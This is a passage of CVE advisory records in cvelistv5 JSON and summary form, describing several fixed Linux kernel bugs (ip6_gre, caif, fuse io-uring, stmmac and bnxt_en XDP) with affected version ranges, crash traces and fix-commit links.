"programFiles": [
"net/ipv6/ip6_gre.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:59.609Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/17e7386234f740f3e7d5e58a47b5847ea34c3bc2"
},
{
"url": "https://git.kernel.org/stable/c/41a1a3140aff295dee8063906f70a514548105e8"
},
{
"url": "https://git.kernel.org/stable/c/adee129db814474f2f81207bd182bf343832a52e"
},
{
"url": "https://git.kernel.org/stable/c/1717357007db150c2d703f13f5695460e960f26c"
},
{
"url": "https://git.kernel.org/stable/c/5fe210533e3459197eabfdbf97327dacbdc04d60"
},
{
"url": "https://git.kernel.org/stable/c/91a2b25be07ce1a7549ceebbe82017551d2eec92"
},
{
"url": "https://git.kernel.org/stable/c/db5b4e39c4e63700c68a7e65fc4e1f1375273476"
}
],
"title": "ip6_gre: make ip6gre_header() robust",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71098",
"datePublished": "2026-01-13T15:34:57.536Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:59.609Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68799 (GCVE-0-2025-68799)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
caif: fix integer underflow in cffrml_receive()
Summary
In the Linux kernel, the following vulnerability has been resolved:
caif: fix integer underflow in cffrml_receive()
The cffrml_receive() function extracts a length field from the packet
header and, when FCS is disabled, subtracts 2 from this length without
validating that len >= 2.
If an attacker sends a malicious packet with a length field of 0 or 1
to an interface with FCS disabled, the subtraction causes an integer
underflow.
This can lead to memory exhaustion and kernel instability, potential
information disclosure if padding contains uninitialized kernel memory.
Fix this by validating that len >= 2 before performing the subtraction.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < f407f1c9f45bbf5c99fd80b3f3f4a94fdbe35691 (git) |
| Linux | Linux | Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < c54091eec6fed19e94182aa05dd6846600a642f7 (git) |
| Linux | Linux | Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < 785c7be6361630070790f6235b696da156ac71b3 (git) |
| Linux | Linux | Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < f818cd472565f8b0c2c409b040e0121c5cf8592c (git) |
| Linux | Linux | Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < 4ec29714aa4e0601ea29d2f02b461fc0ac92c2c3 (git) |
| Linux | Linux | Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < 21fdcc00656a60af3c7aae2dea8dd96abd35519c (git) |
| Linux | Linux | Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < 8a11ff0948b5ad09b71896b7ccc850625f9878d1 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/caif/cffrml.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f407f1c9f45bbf5c99fd80b3f3f4a94fdbe35691",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "c54091eec6fed19e94182aa05dd6846600a642f7",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "785c7be6361630070790f6235b696da156ac71b3",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "f818cd472565f8b0c2c409b040e0121c5cf8592c",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "4ec29714aa4e0601ea29d2f02b461fc0ac92c2c3",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "21fdcc00656a60af3c7aae2dea8dd96abd35519c",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "8a11ff0948b5ad09b71896b7ccc850625f9878d1",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/caif/cffrml.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncaif: fix integer underflow in cffrml_receive()\n\nThe cffrml_receive() function extracts a length field from the packet\nheader and, when FCS is disabled, subtracts 2 from this length without\nvalidating that len \u003e= 2.\n\nIf an attacker sends a malicious packet with a length field of 0 or 1\nto an interface with FCS disabled, the subtraction causes an integer\nunderflow.\n\nThis can lead to memory exhaustion and kernel instability, potential\ninformation disclosure if padding contains uninitialized kernel memory.\n\nFix this by validating that len \u003e= 2 before performing the subtraction."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:10.722Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f407f1c9f45bbf5c99fd80b3f3f4a94fdbe35691"
},
{
"url": "https://git.kernel.org/stable/c/c54091eec6fed19e94182aa05dd6846600a642f7"
},
{
"url": "https://git.kernel.org/stable/c/785c7be6361630070790f6235b696da156ac71b3"
},
{
"url": "https://git.kernel.org/stable/c/f818cd472565f8b0c2c409b040e0121c5cf8592c"
},
{
"url": "https://git.kernel.org/stable/c/4ec29714aa4e0601ea29d2f02b461fc0ac92c2c3"
},
{
"url": "https://git.kernel.org/stable/c/21fdcc00656a60af3c7aae2dea8dd96abd35519c"
},
{
"url": "https://git.kernel.org/stable/c/8a11ff0948b5ad09b71896b7ccc850625f9878d1"
}
],
"title": "caif: fix integer underflow in cffrml_receive()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68799",
"datePublished": "2026-01-13T15:29:09.012Z",
"dateReserved": "2025-12-24T10:30:51.042Z",
"dateUpdated": "2026-01-19T12:19:10.722Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68805 (GCVE-0-2025-68805)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
fuse: fix io-uring list corruption for terminated non-committed requests
Summary
In the Linux kernel, the following vulnerability has been resolved:
fuse: fix io-uring list corruption for terminated non-committed requests
When a request is terminated before it has been committed, the request
is not removed from the queue's list. This leaves a dangling list entry
that leads to list corruption and use-after-free issues.
Remove the request from the queue's list for terminated non-committed
requests.
Severity
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev_uring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a6d1f1ace16d0e777a85f84267160052d3499b6e",
"status": "affected",
"version": "c090c8abae4b6b77a1bee116aa6c385456ebef96",
"versionType": "git"
},
{
"lessThan": "95c39eef7c2b666026c69ab5b30471da94ea2874",
"status": "affected",
"version": "c090c8abae4b6b77a1bee116aa6c385456ebef96",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev_uring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.14"
},
{
"lessThan": "6.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix io-uring list corruption for terminated non-committed requests\n\nWhen a request is terminated before it has been committed, the request\nis not removed from the queue\u0027s list. This leaves a dangling list entry\nthat leads to list corruption and use-after-free issues.\n\nRemove the request from the queue\u0027s list for terminated non-committed\nrequests."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:13.119Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a6d1f1ace16d0e777a85f84267160052d3499b6e"
},
{
"url": "https://git.kernel.org/stable/c/95c39eef7c2b666026c69ab5b30471da94ea2874"
}
],
"title": "fuse: fix io-uring list corruption for terminated non-committed requests",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68805",
"datePublished": "2026-01-13T15:29:13.119Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-13T15:29:13.119Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71095 (GCVE-0-2025-71095)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
Title
net: stmmac: fix the crash issue for zero copy XDP_TX action
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix the crash issue for zero copy XDP_TX action
There is a crash issue when running zero copy XDP_TX action, the crash
log is shown below.
[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000
[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP
[ 216.301694] Call trace:
[ 216.304130] dcache_clean_poc+0x20/0x38 (P)
[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0
[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400
[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368
[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00
[ 216.326576] __napi_poll+0x40/0x218
[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt
For XDP_TX action, the xdp_buff is converted to xdp_frame by
xdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame
depends on the memory type of the xdp_buff. For page pool based xdp_buff
it produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy
XSK pool based xdp_buff it produces xdp_frame with memory type
MEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the
memory type and always uses the page pool type, this leads to invalid
mappings and causes the crash. Therefore, check the xdp_buff memory type
in stmmac_xdp_xmit_back() to fix this issue.
Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: bba2556efad66e7eaa56fece13f7708caa1187f8 , < 3f7823219407f2f18044c2b72366a48810c5c821 (git) |
| Linux | Linux | Affected: bba2556efad66e7eaa56fece13f7708caa1187f8 , < 4d0ceb7677e1c4616afb96abb4518f70b65abb0d (git) |
| Linux | Linux | Affected: bba2556efad66e7eaa56fece13f7708caa1187f8 , < 45ee0462b88396a0bd1df1991f801c89994ea72b (git) |
| Linux | Linux | Affected: bba2556efad66e7eaa56fece13f7708caa1187f8 , < 5e5988736a95b1de7f91b10ac2575454b70e4897 (git) |
| Linux | Linux | Affected: bba2556efad66e7eaa56fece13f7708caa1187f8 , < a48e232210009be50591fdea8ba7c07b0f566a13 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/stmicro/stmmac/stmmac_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3f7823219407f2f18044c2b72366a48810c5c821",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
},
{
"lessThan": "4d0ceb7677e1c4616afb96abb4518f70b65abb0d",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
},
{
"lessThan": "45ee0462b88396a0bd1df1991f801c89994ea72b",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
},
{
"lessThan": "5e5988736a95b1de7f91b10ac2575454b70e4897",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
},
{
"lessThan": "a48e232210009be50591fdea8ba7c07b0f566a13",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/stmicro/stmmac/stmmac_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:55.392Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3f7823219407f2f18044c2b72366a48810c5c821"
},
{
"url": "https://git.kernel.org/stable/c/4d0ceb7677e1c4616afb96abb4518f70b65abb0d"
},
{
"url": "https://git.kernel.org/stable/c/45ee0462b88396a0bd1df1991f801c89994ea72b"
},
{
"url": "https://git.kernel.org/stable/c/5e5988736a95b1de7f91b10ac2575454b70e4897"
},
{
"url": "https://git.kernel.org/stable/c/a48e232210009be50591fdea8ba7c07b0f566a13"
}
],
"title": "net: stmmac: fix the crash issue for zero copy XDP_TX action",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71095",
"datePublished": "2026-01-13T15:34:55.392Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-13T15:34:55.392Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68770 (GCVE-0-2025-68770)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
Title
bnxt_en: Fix XDP_TX path
Summary
In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Fix XDP_TX path
For XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not
correct. __bnxt_poll_work() -> bnxt_rx_pkt() -> bnxt_rx_xdp() may be
looping within NAPI and some event flags may be set in earlier
iterations. In particular, if BNXT_TX_EVENT is set earlier indicating
some XDP_TX packets are ready and pending, it will be cleared if it is
XDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we
successfully call __bnxt_xmit_xdp(). But if the TX ring has no more
room, the flag will not be set. This will cause the TX producer to be
ahead but the driver will not hit the TX doorbell.
For multi-buf XDP_TX, there is no need to clear the event flags and set
BNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in
bnxt_rx_pkt().
The visible symptom of this is that the RX ring associated with the
TX XDP ring will eventually become empty and all packets will be dropped.
Because this condition will cause the driver to not refill the RX ring
seeing that the TX ring has forever pending XDP_TX packets.
The fix is to only clear BNXT_RX_EVENT when we have successfully
called __bnxt_xmit_xdp().
Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 7f0a168b0441ef7fd6b46563efb2706c58ac2a4c , < 4b83902a1e67ff327ab5c6c65021a03e72c081d6 (git) |
| Linux | Linux | Affected: 7f0a168b0441ef7fd6b46563efb2706c58ac2a4c , < f17e0c1208485b24d61271bc1ddc8f2087e71561 (git) |
| Linux | Linux | Affected: 7f0a168b0441ef7fd6b46563efb2706c58ac2a4c , < 0373d5c387f24de749cc22e694a14b3a7c7eb515 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4b83902a1e67ff327ab5c6c65021a03e72c081d6",
"status": "affected",
"version": "7f0a168b0441ef7fd6b46563efb2706c58ac2a4c",
"versionType": "git"
},
{
"lessThan": "f17e0c1208485b24d61271bc1ddc8f2087e71561",
"status": "affected",
"version": "7f0a168b0441ef7fd6b46563efb2706c58ac2a4c",
"versionType": "git"
},
{
"lessThan": "0373d5c387f24de749cc22e694a14b3a7c7eb515",
"status": "affected",
"version": "7f0a168b0441ef7fd6b46563efb2706c58ac2a4c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever 